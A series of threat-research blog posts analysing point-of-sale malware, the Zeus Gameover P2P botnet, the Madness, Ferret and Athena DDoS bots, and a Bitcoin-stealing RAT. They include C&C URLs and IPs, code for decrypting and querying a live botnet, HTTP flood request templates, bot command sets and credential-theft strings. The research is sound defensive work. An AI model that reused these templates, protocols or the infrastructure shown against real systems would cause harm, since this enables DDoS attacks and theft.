Dexter and Project Hook Point-of-Sale Malware Activity Update

By: cwilson -

An increase in credit and debit card theft via Point of Sale (PoS) malware campaigns over the late 2013 holiday season has resulted in significant media attention and has likely emboldened threat actors as the success of past campaigns comes to light. Media attention has decreased since news of the Target breach and associated fallout, however threat actors targeting PoS systems are still engaged in active attacks.

Point of Sale Malware Overview

Certain malware, such as Dexter, Project Hook, Alina, ChewBacca, JackPoS and VSkimmer have been written specifically to compromise Point of Sale machines. Other malware not designed specifically for PoS attack, such as ever-popular Citadel, has the capability to exfiltrate data from the target organization. In short, any system that contains credit/debit card data in any clear-text form in memory or on disk or sends clear-text card data over the network is potentially at risk regardless of whether that machine is a PoS terminal or not.

In addition to Alina, Chewbacca, JackPoS and other Point of Sale malware, ASERT continues to track the Dexter and Project Hook PoS campaigns we originally reported on in December of 2013.  Indicators  suggest that Dexter Revelation may have been in existence as early as April 2013. A new ASERT threat intelligence brief sited at the end of this post provides a significant amount of updated material about Dexter and Project Hook including:

  • Additional actor insight
  • Reverse Engineering information
  • Potentially vulnerable Point of Sale solutions
  • An extensive list of file and network indicators
  • An analysis of possible attack vectors
  • An updated infection map
  • Mitigation suggestions

This information should prove valuable for incident responders and those responsible for protecting cardholder data environments. Additionally, since many of the network and file indicators have not been previously released, these indicators may be useful for identifying environments that are already compromised. The brief also provides scripts for decoding dump files that may help incident responders determine the scope of a compromise.

The following map shows Dexter and Project Hook infections as of January 24, 2014:

Project Hook_Dexter

Continued PoS campaign activity suggests that organizations still need to be vigilant. This new ASERT intelligence brief will help. The full document is available here.

*Author credits: Curt Wilson, Dave Loftus, and Dennis Schwarz

Pretending to be a Zeus Gameover Bot

By: Dennis Schwarz -

Zeus Gameover is a banking trojan that started appearing in the wild sometime in early 2012. As with Citadel, Ice IX, and KINS, it is based on the leaked Zeus trojan source code. The most significant difference between Gameover and its immediate family members is that it uses a peer-to-peer (P2P) network for its command and control (C&C). What also stands out is that there appears to be only one instance of the Gameover botnet, whereas Citadel for example has hundreds of distinct ones.

This post releases some proof of concept code (read: works for me) that helps malware researchers to further understand and also interact with Gameover. More specifically it:

  • Extracts the initial set of P2P peers (starter peers) from a Gameover memory dump
  • Queries each of the starter peers for their “P2P network configuration” file
  • Decrypts and partially parses the configuration into something more human readable
  • Enumerates part of the P2P network

Prior Work

The code is meant to complement the existing body of Gameover malware research. It takes bits and pieces from the following sources and ties them together into something a bit more tangible:

Much appreciation goes to these folks and their work.

Code Availability

Python code will be available on Arbor Network’s GitHub. It depends on the pefile Python module and requires a Gameover memory dump to operate on. The dump used in this demonstration came from a sample that has a MD5 of 216b53fe8c704978468e8bfe1aad1152.

Please note that this is a live malware sample and the code has the ability to connect to and query a live malware C&C network! Stay safe.

Demonstration and Walk-Through

The walk-through data is initialized via:

>>> fp = open(“AML-12420355.rsrc-52307867.dynamic.memdump”, “rb”)
>>> memdump = fp.read()
>>> fp.close()
>>>
>>> from ZeusGameover import ZeusGameover
>>> gameover = ZeusGameover(memdump)

or

$ python ZeusGameover.py AML-12420355.rsrc-52307867.dynamic.memdump

First off, a hardcoded “sample configuration” file is extracted from the memory dump and de-XOR’d with a key stored in the relocation section (.reloc) of the binary (see the get_memdump_config function). This configuration file contains an RC4 key state used later to decrypt the “P2P network configuration” file:

>>> rc4_key = gameover.get_memdump_rc4_key()
>>> print “”.join(rc4_key).encode(“hex”)
a30a0c0f383c42509cf83a0523624520a8c11a7517bab7d97e04dae94bbc390d5a445d6341823b36cc37eab399aed7c3538a1edb847bd8004f5beb4a73e310f1a5e8ec09aff60131f0c4199a3d7f6fc8695c91f416925598ca6e646da243abd29661a971c7fc97b478062d8ef2e5ad2a7c5efb0ebf02d09db8cf47ee80677a4d2ebd0b727487d1039f891c59f326609340d3aa3522cedf28159ba0c2a4b6883ee2496518beefd427b025b1ac1fa61d338ff96c1b7766d632cdfe12b2c034865f30eddcf7dec9e468c548d5297657bb588d4ca1905424ff4ee16b8be0832f94796a95857d9e81e67051fdcbe752fa2c07b91446112ba7088c21ddc6b5f556133f0000

The “sample configuration” file also contains the starter peers used to bootstrap communications with the P2P network (see the get_static_peers function):

static peer #1
ip: 74.96.168.126, udp port: 6710, rc4 key: c2056f859dd9fdf008507a637a0da568d16f825b

static peer #2
ip: 74.203.254.118, udp port: 6630, rc4 key: c046b43fbcec2475831083aa56aef3d5b72ceda6

static peer #3
ip: 70.30.53.56, udp port: 8204, rc4 key: a398bc30c436194c025513cb4bcafc1287460293

Using their respective UDP ports and RC4 keys, each of the starter peers is sent a “version” query to see if the peer is still alive. If so, the query will return version information and a TCP port (see the query_peer_for_version function):


static peer #8
ip: 85.100.41.9, udp port: 8835, rc4 key: d6c0d41b51dcb4b76205f3ab00f50af4411a22b9
binary version: 70314355, config version: 76101317, tcp port: 2997

If the TCP port is active, it is queried for the “P2P network configuration” file (see the query_peer_for_config and parse_config_response functions):


static peer #9
ip: 94.247.29.186, udp port: 3415, rc4 key: a5f5957b3acc687da57e5287837ea70c9ef827f6
binary version: 70314355, config version: 76101317, tcp port: 4948
config saved (1033680 actual bytes)

The “P2P network configuration” file is decrypted with the RC4 key state from above and lightly parsed. Parsing includes de-XORing and, if necessary, zlib decompressing the individual data “sections” of the config (see the parse_config function):

$ strings 94.247.29.186.config

[start item number: 22003, type: 0x10000001, packed size: 854, unpacked size: 2201]
@https://bancopostaimpresaonline.poste.it/bpiol/lastFortyMovementsBalance.do?method=loadLastFortyMovementList
@https://*.tecmarket.it/*
@https://www3.csebo.it/*
@https://qweb.quercia.com/*

[start item number: 2, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/s_c.php

[end item number: 2]
[start item number: 3, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/g_c.php


[start item number: 14, type: 0x40000001, packed size: 196, unpacked size: 298]
ERCPQ
inject
<script type=”text/javascript” src=”scripts/service?id=7″ language=”JavaScript”></script>S
ERCPM
inject
style=’visibility:hidden’
[end item number: 14]

Over time, the “P2P network configuration” can be queried via new Gameover samples and a timeline of when changes are made and where those changes are start to appear:

gameover_configs

$ diff -u jan_25.config.strings jan_28.config.strings
— jan_25.config.strings 2014-01-29 15:59:54.000000000 -0500
+++ jan_28.config.strings 2014-01-29 15:59:41.000000000 -0500

[start item number: 1, type: 0x40000000, packed size: 39, unpacked size: 39]
-http://nessura.com/oz/service.php
+http://kessura.com/oz/service.php
[end item number: 1]

In addition to the configuration data, the starter peers can be used to further enumerate the P2P network (see the enumerate_peers function):


peer #21
ip: 115.162.112.200, udp port: 5782, rc4 key: d29e52a567b266b53c8269433c5462c2cf0c4fdd

peer #22
ip: 64.25.199.1, udp port: 6977, rc4 key: d75dfdb4f96e623546940e8a8c03872e07eed9d2

peer #88
ip: 99.190.124.179, udp port: 1671, rc4 key: d3526a00abf536c6a1df7d8607c9635c0bd98dc1

peer #89
ip: 153.160.176.252, udp port: 4714, rc4 key: d27382dbec8a01a3c4b405e063a1c10267313d19

From a set of twenty starter peers and using a breadth first search an interesting pattern emerges:

breadth_first

This graph shows how many total unique peers are at each level of the enumeration. While this certainly does not represent the entire Gameover P2P network, it does start to give an idea of its size and scope. Thanks to Kenny MacDermid for the above idea and help on the visual.

Conclusion

Zeus Gameover is a banking trojan that has been around for a couple of years now. It continues to be very active and as of this writing is in ASERT’s top five of tagged malware samples. This is interesting because Gameover is also a well-researched malware family. Usually the longer a family exists and the more focus the malware research community gives it, the less active the malware becomes. But, Gameover continues to be in the limelight and continues to infect and affect a large number of people and companies across the Internet.

This post hopes to complement and further the existing malware research into Gameover. In addition, it hopes to also assist enterprises and service providers to detect and mitigate infected peers and banks and financial institutions to determine if and how they are being targeted.

Can I Play with Madness?

By: Jason Jones -

Madness Pro is a relatively recent DDoS bot, first  seen by ASERT in the second half of 2013 and also profiled by Kafeine in October 2013. Kafeine’s blogpost gave good insight into one method of infection and how quickly a potent DDoS botnet can be built. This post will take a deeper-dive into what Madness does upon infection of a system and what its attack capabilities are.

Installation

Madness uses standard methods to achieve persistence on the system and evade detection. For persistence, it sets up autorun via:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun if the user does not have admin privileges
  • via HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
  • if that fails to HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun if the user does have admin privileges

It also creates 4 files in the user’s home folder named per, perper, perperper, perperperper (hint: search for these filenames on malwr.com to find more samples :) ) that contain the registry key values above followed by [7] and [8] for WORLD_FULL_ACCESS and WORLD_READ_ACCESS and run regini on the file to setup the registry permissions on those registry keys before doing the above. A mutex named GH5K-GKL8-CPP4-DE24 will also be created to block multiple installations of Madness (since the mutex we have observed has been the same across all samples we have encountered, it also blocks competitors). It will then attempt to bypass the firewall in Windows XP/Vista/7/8 by turning it off the service  and then disabling autostart of that service.

Many of the interesting strings are encoded with Base64, which include the above-mentioned registry keys, commands, mutex values and operating system names. This makes many of the strings very recognizable and easy to identify with a Yara rule. One example rule has been committed to our GitHub repository.

Capabilities

Capability-wise, Madness Pro has a large number of DDoS attacks and a download and execute command. The latest version we have observed in the wild is 1.15. The network phone-homes for Madness resemble the WireShark screenshot below. They include a unique randomly-generated bot ID, a version, the mk parameter, the OS version, privilege level on the system, c – a counter for the number of phone homes, rq – a counter for the number of successful attack payloads sent since the last phone-home. The response from the server is a base64-encoded, newline-separated list of commands. Multiple targets can be specified per command by separating them with a semicolon.

Madness Phone-Home

Madness Phone-Home

I also wrote a Suricata / Snort rule to detect these phone-homes:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[ASERT] TROJAN W32/Madness Checkin"; flow:established,to_server; content:"GET"; http_method; content: "?uid="; pcre: "/?uidx3d[0-9]{8}x26verx3d[0-9].[0-9]{2}x26mkx3d[0-9a-f]{6}x26osx3d[A-Za-z0-9]+x26rsx3d[a-z]+x26cx3d[0-9]+x26rqx3d[0-9]+/"; reference:url,www.arbornetworks.com/asert/2014/01/can-i-play-with-madness/; reference:md5,3e4107ccf956e2fc7af171adf3c18f0a; classtype:trojan-activity; sid:3000001; rev:1;)

The DDoS attacks use a combination of WinSock, WinInet (InternetOpenRequestA + HttpSendRequestA), and UrlMon (URLDownloadToFileA) functions. The identified commands are shown below:

exe   - download and execute file
wtf   - stop attacks
dd1   - GET Flood using WinSock
dc1   - AntiCookie GET Flood using WinSockds1   - Slow GET Flood using WinSock
dd2   - POST Flood Using WinSock
dd3   - GET Flood Using WinInet
dd4   - POST Flood Using WinInet
dd5   - ICMP Flood Using WinSock
dd6   - UDP Flood Using WinSock
dd7   - HTTP Flood Using URLDownloadToFileA

The POST and UDP floods both support specification of flood text by appending ‘@@@’ and then the flood text (default is ‘flud_text’). The Cookie recognition code will look for document.cookie and cookies specified of the form ["cookie","realauth=<value>","location"] and attempt to parse the value out.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]

The flood template for the WinSock POST request is below, note that the Referer and Cookie headers are only included in the attack if there are referer and cookie values. The user-agent will be incrementally selected from the list above (although the AntiCookie code has a small bug :) ). The WinSock GET and AntiCookie GET attacks use similar templates sans the POST data and of course with the GET HTTP verb instead of POST HTTP verb.

POST <uri> HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: <target>
Content-Length: <length>
User-Agent: <user-agent from list>
Referer: <referer>
Cookie: <cookie>
Cache-Control: no-cache
Connection: Keep-Alive

<post data>

The Slow GET flood only sends the GET request and a Host header, sleeps for 100 milliseconds, and then send the rnrn to finish the request.

The UDP and ICMP floods are pretty standard compared to most other DDoS bots. The download and execute command functionality has been used sparingly from the CnCs that we have tracked, except for….

Playing with Madness

Sometimes a botnet admin mistakenly gives you an FTP download link with server credentials that allows for retrieval of an intact panel that includes credentials for the admin area of the web panel. Fortunately, this admin only had a total of 10 bots and at least 3 of those were researchers :). There’s not much more to the admin panel than what is showed in the screenshot below:

Madness Panel 1.13

Madness Panel 1.13

Madness Symbols

Madness Symbols

Sometimes the malware author forgets to run ‘strip’ on the binaries he’s generating for customers and these end up in my hands. Unfortunately not until after I had finished my initial reversing, but I was able to validate my analysis and also investigate identify a few things I had not noticed before. One of the interesting things that was not referenced in any calls in that version (and has been since – now the dc1 attack) was the WinSockGetAntiCookies function and in the latest 1.15 version.

We’ve also had Madness in our botnet tracking system for a number of months and have some interesting data on some of the sites that have been targeted. One of the most popular targets appears to be the ”underground” forum fuckav.ru, but the botnets do not appear to be very large as the availability of the site does not appear to be affected very much. The locations of the CnCs tracked are fairly geographically disparate –  locations that we have found CnCs hosted include the United States, Russia, Slovakia, Netherlands, and France.

Conclusion

Given the breadth of the DDoS attacks available in Madness and the ability to attack large numbers of targets at the same time, it does not appear that Madness will be going away anytime soon in the DDoS space. A number of very active CnCs have been observed so far, and we can only expect to see more in the future.

Related MD5:
cc303da2c4b7a031d578c1dbf5af1970
027dcd2e6d231598c47557bdea98843d
60c77216bfcc21a2b993ca7e688f5b20
df99277fb3946c0327f10dc1c501452c
3fb38453a63dca35c0e751a709485e2b
32187e96c5af1177c35813c17302babf

A Business of Ferrets

By: Dennis Schwarz -

Trojan.Ferret appeared on my radar thanks to a tweet by @malpush. The tweet revealed a URL that at the time of this writing was pointing to a command and control (C&C) panel that looked like this:

login

The logo alone convinced me to study this business of ferrets further. Coincidentally (for Arbor), it turns out that this malware is a DDoS bot.

Malware Sample

The sample analyzed can be found at malwr (MD5: 4fa91b76294d849d01655ffb72b30981).

It is written in Delphi and plays the following malware games: UPX packing, string obfuscation, anti-virtual machine, anti-debugging, self-modifying code, and process hollowing.

Based on the Delphi usage and the language used for part of the panel, this bot is likely of Russian origin.

Obfuscations

Trojan.Ferret uses two methods of obfuscation; both are a combination of base64 and XOR. Different keys are used for various sections. The first obfuscation method is used mostly for strings and can be decrypted with the following Python function:

def decrypt_strings(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for i in range(len(msg_no_b64)):
    key_lsb = ord(key[i % len(key)]) & 0xf
    msg_lsb = ord(msg_no_b64[i]) & 0xf

    c = msg_lsb ^ key_lsb
    d = c ^ 0xa

    msg_slsb = ord(msg_no_b64[i]) & 0xf0
    plain_byte = msg_slsb ^ d

    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH")
'Kernel32.dll'

>>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH")
'GetModuleHandleA'

>>> decrypt_strings("dWpkbXFqZmxi", "mu#X")
'removeone'

>>> decrypt_strings("cn9tY3Nqf2d1", "mu#X")
'updatever'

>>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx")
'http://188.190.101.13/hor/input.php'

The second method is used mostly for C&C communications and can be cleaned up with the following Python function:

def decrypt_cnc(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for offset, enc_byte in enumerate(msg_no_b64):
    plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)])
    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_cnc("ChYJCRhta3k=", "x38")
'2.11 USA'

>>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "x38")
'5 x86 A 0d 0h 7m 28s'

Command and Control

C&C is HTTP based. Two message types have been identified. The first is message type 0 or the “phone home” and looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded

m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=

Here’s what it looks like decrypted:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

Its POST parameters are:

  • m – Message type (0)
  • h – Hash based on computer name
  • p – Computer name
  • v – Version and locale
  • s – Windows version, architecture, user type, and uptime

The phone home response looks like:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN

Decrypted, it is the User-Agent used in the request:

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "x38")
'Mozilla Gecko Firefox 25'

The second message type is 1 or “poll for commands”. It looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

And here it is decrypted:

m=1&h=18803769021711750776216376939

Its POST parameters are:

  • m – Message type (1)
  • h – Hash based on computer name

An example poll response is:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8

UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=

Decrypted:

>>> decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "x38")
'httpflood*http://target.net/index.php/*80*150*0'

Commands are delimited by “*”s and are formatted like:

command*arg1*arg2*arg3*arg4*arg5*arg6*arg7

Commands

The following bot commands have been identified:

  • httpflood – HTTP GET flood
  • httppost – HTTP POST flood
  • udpflood – UDP flood
  • synflood – TCP connect flood
  • tcpflood – TCP flood
  • download – download and execute (all bots)
  • downloadone – download and execute (specified bot)
  • update – update (all bots)
  • updateos – update (specified OS)
  • updateone – update (specified bot)
  • updatever – update (specified version)
  • removeos – remove bot (specified OS)
  • removeone – remove bot (specified bot)
  • s! – stop all floods
  • su – stop UDP flood
  • sh – stop HTTP flood
  • ss – stop TCP SYN flood
  • st – stop TCP flood

More information about each command can be found in the “Task Management” section of the C&C panel:

tasks1

tasks2

Note: I didn’t see any references to the “memexec” or “script” commands in the analyzed binary.

C&C Panel

Wrapping up, here is a behind the scenes tour of the C&C panel; the “Statistic/Index” page:

index

Here is the “Uploads” page:

uploads

And, part of the “Bot List” page:

bots

Conclusions

This post has analyzed the crypto, C&C infrastructure, and command set of Trojan.Ferret—a new DDoS bot that is likely of Russian origin.  At the time of this writing only a handful of unique samples and C&C servers have been identified, so the scope and impact of the new threat is still uncertain. ASERT will continue to track this business of ferrets, and any other new businesses that arise.

Bitcoin Alarm – Bitcoin stealing spam

By: Kenny MacDermid -

The rise in Bitcoin values seems to have caused an equal increase of Bitcoin spam as malware authors attempt to make money off the many new market participants. One site that was spammed to me three times in one day is bitcoin-alarm.net. I ignored it the first two times, but they must have really wanted me to look at it, so who am I not to oblidge.

Bitcoin Alarm Logo

The site promises a tool to notify you of market changes by SMS, without ever mentioning any nefarious behaviour. YouTube videos teach you what Bitcoin is, and how to install this free tool.  They even provide a link so you can donate to the author, although it appears no one has chosen to do so. This I have to download.

BitcoinAlarm Icon

The download BitcoinAlarm.exe (MD5: edfa12d4a454b0eb786bbe92050ab88a) had just 1 hit on VirusTotal when I first scanned it (from Kaspersky). Is it a false positive on a nice free tool? Lets dig deeper.

The download is an installer. A quick strings didn’t turn up anything interesting, so lets try binwalk:

Binwalk Results - a rar archive
I carved out this RAR archive to see what it contains:

dd if=BitcoinAlarm.exe.virus of=out.rar bs=1 skip=756224
mkdir ext
unrar x out.rar ext/

Unrar results: an SFX script and 5 files.

There’s an SFX script run, lets see what it does:

CreateObject("WScript.Shell").Exec "winupdate.exe 5943564.IFW"

cat 7246235.vbe

A quick check of winupdate.exe with VirusTotal shows that it’s the valid (and non-malicious) AutoIt executable. AutoIt is a great little scripting language for Windows, it’s especially useful for automating GUI related tasks. So if winupdate.exe is AutoIt that would make 5943564.IFW an AutoIt script. It looks like it was obfuscated somewhat though:

a bunch of comments

head 5943564.IFW

Run it through

sed -e '/^;[0-9]/d'

to clean up the garbage and we end up with this script. It starts by checking if Avast is running and if so it sleeps for 20 seconds. I guess this is long enough for Avast to get bored and go look at something else:

if Avast, sleep for 20 seconds

Well, that’s certainly not a good sign. It’s a pretty solid chance that if software is checking for an antivirus engine that it’s up to no good. A scan of the rest of the file contains other interesting methods like “disable_uac”, “anti_hook”, “persistence”, “botkiller”, “downloader”, “disable_syste_restore”. It’s starting to look like Kaspersky was right, congrats on being the 1/49 to detect this.

I see a lot of calls to IniRead(), and they’re all reading 65901.PPZ. It looks like this is the configuration file. In contains:

[6404000]
6662859=9455413
[2244034]
6224525=3244993
[3206254]
5598349=4588436
[5378250]
6296134=4064234
[1109091]
1109091=asvep

Matching these to the script we see find the sections are:

# 6404000 == disable_uac()
# 2244034 == AdlibRegister("anti_hook", 500)
# 3206254 == AdlibRegister("persistence", 500)
# 5378250 == startup()
# 1109021 == $sKey

This crypto key is used in Main to decrypt and run the file 20070.RQT:

decrypt and run 20070.RQT with cryptkey

The easiest way to decrypt this file was to simply let the script do the work. There’s a lot of code outside of functions though, so care has to be taken to remove everything non-crypto related. Remove the _RunPE() and replace it with

FileWrite($uniscriptdir & "DECRYPTED", $sArquive)

The decrypted file had 30/48 hits of VirusTotal when I scanned it (MD5: 224c73f8172123e5ddca2302425664a6). It’s called NetWiredRC and is a remote access trojan made for stealing login information, and likely in this case being used to steal Bitcoins. It connect to bitcoins.dd-dns.de on port 3360.

Some choice credential related strings from the decrypted malware:

%sThunderbirdprofiles.ini
select *  from moz_logins
%s.purpleaccounts.xml
SoftwareMicrosoftInternet ExplorerIntelliFormsStorage2

This free utility is nothing more than malware with very low detection rate being spammed to anyone that might have a Bitcoin sitting around. When I checked the domain with urlvoid it had zero ‘bad’ reports and was not blacklisted. I’ve since submitted the domain to multiple scanners and it’s now detected by Scumware.

On a recheck BitcoinAlarm.exe’s detection is up to 14 of 49 scanners, and the download link appears to return 404. bitcoins.dd-dns.de is no longer answering on port 3360.

Never before has it been so easy to leave cash accessible from the Internet, so expect more malware to make off with your Bitcoin wallet. Bitcoins that are not in use should be moved off into cold storage, or donated to the human fund at 136K8a5Mb8uDguFb7RnoXz7gzBSe2xaEED (ahem, worth a shot right?).

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank

 

Athena, A DDoS Malware Odyssey

By: Jason Jones -

The Athena malware family  has existed for quite some time and appears to have a love/hate relationship based on posts in various “underground” forums . The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post will discuss it’s origins, DDoS capabilities, and go over it’s latest evolution and offer some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and then subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware and not so much for DDoS. The majority of CnC would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also used a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
AthenaIRC 2.3.1 Manual Cover

AthenaIRC 2.3.1 Manual Cover

Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner“. In the 1.X days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet building escapades without having to purchase. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) being  superior.

The 2.X versions saw this distribution model change and _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and proliferation of various versions that we have seen come through our zoo business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into their IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant amount of commands added: more DDoS commands, more password stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that  obfuscates the IP address  by adding or subtracting a static value from each octet of the IP depending on where it falls in the top or bottom half of the valid octet range. This feature was observed in our sandboxing system many times where a CnC hostname pointed to an IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.

The pricing structure for 2.3.1 is $100 for one build, $10 to rebuild or update, $15 to have _Stoner setup your IRC, and $130 for a ready-made IRC channel that is “capable of holding 20k bots” and one build.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like I was Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena IRC Command Parsing

Athena offers many DDoS attacks including standard HTTP GET/POST floods, UDP flood, RUDY, Slowloris, Slowpost, ARME, HTTP flood via hidden browser, bandwidth floods and an established connection flood attack.  The attacks perform as advertised, but, unlike other DDoS bots, only one attack at a time can be carried out. This severely limits its ability to compete in the underground DDoS-for-hire marketspace with other bots like Madness, Drive, and DirtJumper

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated and if they are above or below certain values then different values are selected for the header and in some cases the randomly generated value is used to determin whether or not to include a header at all. The image below illustrates the possible headers that are include and the potential values for those that are to be included. Green means the value is selected based on which attack is ordered, values in black are always included, headers in blue are randomly included and then the red values are the values that the final header value is selected from.

Athena HTTP Request Building

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. There are three parameters – a,b and c – that are sent with the POST request to the CnC. The a parameter is a fully URL encoded base64 string, that will provide a colon separated string translation table. The string translation table will be used on the b parameter which is another base64 string – this time not URL encoded – and then base64 decoded to yield the phone-home data of the bot, and c is used as a data marker on the response from the server. The initial phone home format format string is below, where gend is the “gender” (laptop,desktop,etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

and then subsequent phone-homes will use this format string. The bk_ signify “botkill” data, and busy signifies whether or not the bot is busy with a command.

